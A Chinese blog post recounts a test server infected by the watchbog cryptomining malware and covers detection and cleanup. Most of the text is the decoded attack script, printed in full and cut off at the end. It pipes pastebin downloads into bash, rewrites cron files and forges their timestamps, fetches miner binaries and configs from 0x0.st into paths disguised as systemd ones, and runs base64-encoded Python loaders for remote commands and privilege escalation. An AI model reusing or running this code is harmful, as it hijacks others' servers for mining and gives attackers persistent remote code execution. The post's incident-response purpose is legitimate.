服务器中毒事件-挖矿进程watchbog

前言

最近一台对外网开放了一个端口的测试服务器上跑的服务老是挂,几乎是一天就挂掉一次,周五下午重启服务的时候发现有些异常,仔细一查,原来是中了挖矿木马.进程名为watchbog

发现过程

我重启完服务后发现shell里多打印了一句

1
You have mail in /var/spool/mail/root

打开这个文件一看,发现里面写着的明显是一个恶意脚本

1
curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash

输入top一看,果然有一个cpu占用100%的进程watchbog

1
31533 root      20   0  322m 7088 2384 S 100.2  0.0   1:10.46 watchbog

清除恶意脚本

这个木马修改了机器里所有的cron表达式,只要有执行定时任务的服务就会触发脚本并下载挖矿木马
首先我们需要暂时禁用网络,以防重新加载新的脚本

1
2
3
4
#杀掉进程
killall watchbog
#找出所有被修改的文件,找到以后修改回正确的配置,恶意脚本直接删除
find / -name \* -type f -print | xargs grep "pastebin"

脚本分析

这个脚本是放在pastebin.com里的(脚本地址),脚本经过base64加密,解密后的脚本我直接贴出来好了
可以看到当注入成功以后,还会打印Hahahaha的字段,也是非常恶趣味了


恶意脚本

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy

function system() {
rm -rf /bin/httpntp
grep -v “/bin/httpntp” /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
if [ ! -f “/bin/httpntp” ]; then
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
if [ ! -f “/bin/httpntp” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
fi
if [ ! -f “/etc/crontab” ]; then
echo -e “0 1 root /bin/httpntp” >> /etc/crontab
else
echo -e “0 1
root /bin/httpntp” >> /etc/crontab
fi
fi
}

function dragon() {
nohup python -c “import base64;exec(base64.b64decode(‘I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmludCgnSSBjYW5cJ3QgdW5kZXJzdGFuZCB0aGUgYWN0aW9uIGFtIGdpdmVuJykKZXhjZXB0OgogICAgcHJpbnQoJ1NvcnJ5IGJvc3MgSSBjYW5cJ3QgZ2V0IGluc3RydWN0aW9ucycpCiAgICBwYXNzCg==’))” >/dev/null 2>&1 &
touch /tmp/.tmpza
}

function spreada() {
touch /tmp/.tmpold
path1=”/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data”
path2=”/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data/dropout/“
mkdir -p $path1
mkdir -p $path2
ARCH=$(uname -i)
ARC=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady2"
elif [ “$ARCH” == “i386” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady"
elif [ “$ARC” == “x86_64” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady2"
elif [ “$ARC” == “i686” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady"
else
touch /tmp/.finished
exit 0
fi
curl -fsSL $URL -o $path1/oldlady && chmod 777 $path1/oldlady
if [ ! -f “/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data/oldlady” ]; then
wget $URL -O $path1/oldlady && chmod 777 $path1/oldlady
fi
cd $path1
nohup ./oldlady >/dev/null 2>&1 &
}

function cronhigh() {
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
echo -e “/3 root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
echo -e “
/5 root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
echo -e “/7 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e “
/9 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
if [ ! -f “/etc/cron.hourly/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
fi
mkdir -p /etc/cron.daily
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
if [ ! -f “/etc/cron.daily/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
fi
mkdir -p /etc/cron.monthly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
if [ ! -f “/etc/cron.monthly/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
fi
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/system
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/Anacron
touch -acmr /bin/sh /etc/cron.daily/Anacron
touch -acmr /bin/sh /etc/cron.monthly/Anacron
}

function cronlow() {
cr=$(crontab -l | grep -q “https://pastebin.com/raw/3XEzey2T" | wc -l)
if [ ${cr} -eq 0 ];then
echo “Cron dosen’t exists”
crontab -r
(crontab -l 2>/dev/null; echo “/1 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1”)| crontab -
else
echo “Cron exists”
fi
}

function downloadlow() {
pa=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pa} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/

if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json” ]; then
curl -fsSL https://0x0.st/sGdX.jpeg -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json” ]; then
wget https://0x0.st/sGdX.jpeg -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
fi
fi
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGkx.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGkx.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ “$ARCH” == “i686” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}

function downloadhigh() {
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/config.json /bin/watchbog
if [ ! -f “/bin/config.json” ]; then
curl -fsSL https://0x0.st/sGdX.jpeg -o /bin/config.json && chmod 777 /bin/config.json
if [ ! -f “/bin/config.json” ]; then
wget https://0x0.st/sGdX.jpeg -O /bin/config.json && chmod 777 /bin/config.json
fi
fi
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGkx.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGkx.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ “$ARCH” == “i686” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}


function testhigh() {
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/watchbog /bin/config.json
if [ ! -f “/bin/config.txt” ]; then
curl -fsSL https://0x0.st/sGdT.png -o /bin/config.txt && chmod 777 /bin/config.txt
if [ ! -f “/bin/config.txt” ]; then
wget https://0x0.st/sGdT.png -O /bin/config.txt && chmod 777 /bin/config.txt
fi
fi
if [ ! -f “/bin/cpu.txt” ]; then
curl -fsSL https://0x0.st/sGdH.png -o /bin/cpu.txt && chmod 777 /bin/cpu.txt
if [ ! -f “/bin/cpu.txt” ]; then
wget https://0x0.st/sGdH.png -O /bin/cpu.txt && chmod 777 /bin/cpu.txt
fi
fi
if [ ! -f “/bin/pools.txt” ]; then
curl -fsSL https://0x0.st/sGdN.png -o /bin/pools.txt && chmod 777 /bin/pools.txt
if [ ! -f “/bin/pools.txt” ]; then
wget https://0x0.st/sGdN.png -O /bin/pools.txt && chmod 777 /bin/pools.txt
fi
fi
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdc.jpeg -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdc.jpeg -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt
fi
fi
}

function testlow() {
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt” ]; then
curl -fsSL https://0x0.st/sGdT.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt” ]; then
wget https://0x0.st/sGdT.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt” ]; then
curl -fsSL https://0x0.st/sGdH.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt” ]; then
wget https://0x0.st/sGdH.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
fi
fi
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt” ]; then
curl -fsSL https://0x0.st/sGdN.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt” ]; then
wget https://0x0.st/sGdN.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
fi
fi
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdc.jpeg -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdc.jpeg -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
}

function successhigh() {
(curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
touch /tmp/.tmpc
}

function successlow() {
(curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
touch /tmp/.tmpc
}

function elevate() {
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
echo “The Arch Is Supported lets GO On”
python -V >/dev/null 2>&1
if [ “$?” = “0” ]; then
echo “Python Is Avalaible lets GO On”
python -c “import base64;exec(base64.b64decode(‘aW1wb3J0IGhhc2hsaWIKaW1wb3J0IG9zCmltcG9ydCBvcy5wYXRoCmltcG9ydCB0aW1lCgpqb2tlX2RpYyA9IFsKICAgICc0LjQuMC0zMS1nZW5lcmljJywKICAgICc0LjQuMC02Mi1nZW5lcmljJywKICAgICc0LjQuMC04MS1nZW5lcmljJywKICAgICc0LjQuMC0xMTYtZ2VuZXJpYycsCiAgICAnNC44LjAtNTgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLjQyLWdlbmVyaWMnLAogICAgJzQuMTMuMC0yMS1nZW5lcmljJywKICAgICc0LjkuMC0zLWFtZDY0JywKICAgICc0LjkuMC1kZWVwaW4xMy1hbWQ2NCcsCiAgICAnNC44LjAtNTItZ2VuZXJpYycsCiAgICAnNC44LjYtMzAwLmZjMjUueDg2XzY0JywKICAgICc0LjExLjgtMzAwLmZjMjYueDg2XzY0JywKICAgICc0LjEzLjktMzAwLmZjMjcueDg2XzY0JywKICAgICc0LjUuMi1hdWZzLXInLAogICAgJzQuNC4wLTg5LWdlbmVyaWMnLAogICAgJzQuOC4wLTU4LWdlbmVyaWMnLAogICAgJzQuMTMuMC0xNi1nZW5lcmljJywKICAgICc0LjkuMzUtZGVza3RvcC0xLm1nYTYnLAogICAgJzQuNC4yOC0yLU1BTkpBUk8nLAogICAgJzQuMTIuNy0xMS5jdXJyZW50JywKICAgICc0LjQuMC04OS1nZW5lcmljJywKICAgICc0LjguMC00NS1nZW5lcmljJywKICAgICc0LjEwLjAtMjgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLTE5LWdlbmVyaWMnLAogICAgJzQuOC4wLTM5LWdlbmVyaWMnXQoKbXlfa2VybmVsX3ZlciA9IG9zLnBvcGVuKCd1bmFtZSAtcicpLnJlYWQoKS5zdHJpcCgpICMKCmNvbSA9ICcnJ25vaHVwIGJhc2ggLWMgJyhjdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy8zWEV6ZXkyVHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzNYRXpleTJUKXxiYXNoJyA+L2Rldi9udWxsIDI+JjEgJgpybSAtcmYgL3RtcC9hY3RpdmF0ZScnJwoKZGVmIG1kNUNoZWNrc3VtKGZpbGVQYXRoKToKICAgIHdpdGggb3BlbihmaWxlUGF0aCwgJ3JiJykgYXMgZmg6CiAgICAgICAgbSA9IGhhc2hsaWIubWQ1KCkKICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICBkYXRhID0gZmgucmVhZCg4MTkyKQogICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIG0udXBkYXRlKGRhdGEpCiAgICAgICAgcmV0dXJuIG0uaGV4ZGlnZXN0KCkKCmRlZiBtYWluKCk6CiAgICBHb0pva2UgPSBteV9rZXJuZWxfdmVyIGluIGpva2VfZGljCiAgICBmID0gb3BlbignL3RtcC9hY3RpdmF0ZScsICd3JykKICAgIGYud3JpdGUoY29tKQogICAgZi5jbG9zZSgpICAgIAogICAgaWYgR29Kb2tlOgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi93Z2V0JykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnd2dldCBodHRwczovLzB4MC5zdC9zR2RiLmV4ZSAtTyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgNzc3IC90bXAvZWxhdmF0ZSAmJiBjaG1vZCAreCAvdG1wL2VsYXZhdGUnKQogICAgICAgIGVsaWYgb3MucGF0aC5leGlzdHMoJy91c3IvYmluL2N1cmwnKSBhbmQgb3MucGF0aC5pc2ZpbGUoJy91c3IvYmluL2N1cmwnKToKICAgICAgICAgICAgb3Muc3lzdGVtKCdjdXJsIGh0dHBzOi8vMHgwLnN0L3NHZGIuZXhlIC1vIC90bXAvZWxhdmF0ZSAmJiBjaG1vZCA3NzcgL3RtcC9lbGF2YXRlICYmIGNobW9kICt4IC90bXAvZWxhdmF0ZScpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcmV0dXJuCiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoJy90bXAvZWxhdmF0ZScpIGFuZCBvcy5wYXRoLmlzZmlsZSgnL3RtcC9lbGF2YXRlJyk6CiAgICAgICAgICAgIGlmIG1kNUNoZWNrc3VtKCcvdG1wL2VsYXZhdGUnKT09JzE1NzQ5NWY2YmE4YzM2YzM4OTg0ZDFmOTAyY2YzYWMwJzoKICAgICAgICAgICAgICAgIG9zLnN5c3RlbSgnY2QgL3RtcC8gJiYgLi9lbGF2YXRlIDwgYWN0aXZhdGUnKQogICAgICAgICAgICAgICAgdGltZS5zbGVlcCgxMCkKICAgIGVsc2U6CiAgICAgICAgcmV0dXJuCgptYWluKCkK’))” >/dev/null 2>&1
else
cronlow
downloadlow
fi
sleep 30
if [ ! -f “/tmp/activate” ]; then
echo “I guess The Exploit worked”
pmp=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pmp} -ne 0 ];then
pup=$(ps auxf | grep ‘watchbog’ | grep -v grep | awk ‘{print $1}’)
if [ “$pup” == “root” ];then
echo “The Exploit worked Successfully”
echo “Hahahahha”
rm -rf /tmp/elevate
cronlow
exit 0
else
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
else
rm -rf /tmp/elevate
rm -rf /tmp/activate
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
}


update=$( (curl -fsSL –max-time 120 https://pastebin.com/raw/2unJiD3b) )
if [ “$update” == “update”x ];then
echo “An update exists boss”
rm -rf /tmp/.tmpza
if [ ! -f “/tmp/.tmpold” ]; then
spreada
fi
else
echo “NO update exists boss”
fi
BS=$( whoami )
echo “I am $BS”
if [ “$BS” != “root” ];then
if [ ! -f “/tmp/.tmpleve” ]; then
crontab -r
ps auxf|grep -v grep|grep “watchbog” | awk ‘{print $2}’|xargs kill -9
pkill -f watchbog
fi
ps -fe|grep ‘watchbog’|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo “It’s running boss”
crontab -r
cronlow
else
if [ ! -f “/tmp/.tmpleve” ]; then
rm -rf /tmp/.tmpelev
touch /tmp/.tmpleve
elevate
else
downloadlow
fi
cronlow
sleep 15
if [ ${pm} -eq 0 ];then
testlow
fi
pm=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f “/tmp/.tmpc” ]; then
successlow
fi
fi
fi
fi
if [ “$BS” == “root” ];then
ps -fe|grep ‘watchbog’|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo “It’s running boss”
system
cronhigh
downloadhigh
else
system
cronhigh
downloadhigh
sleep 15
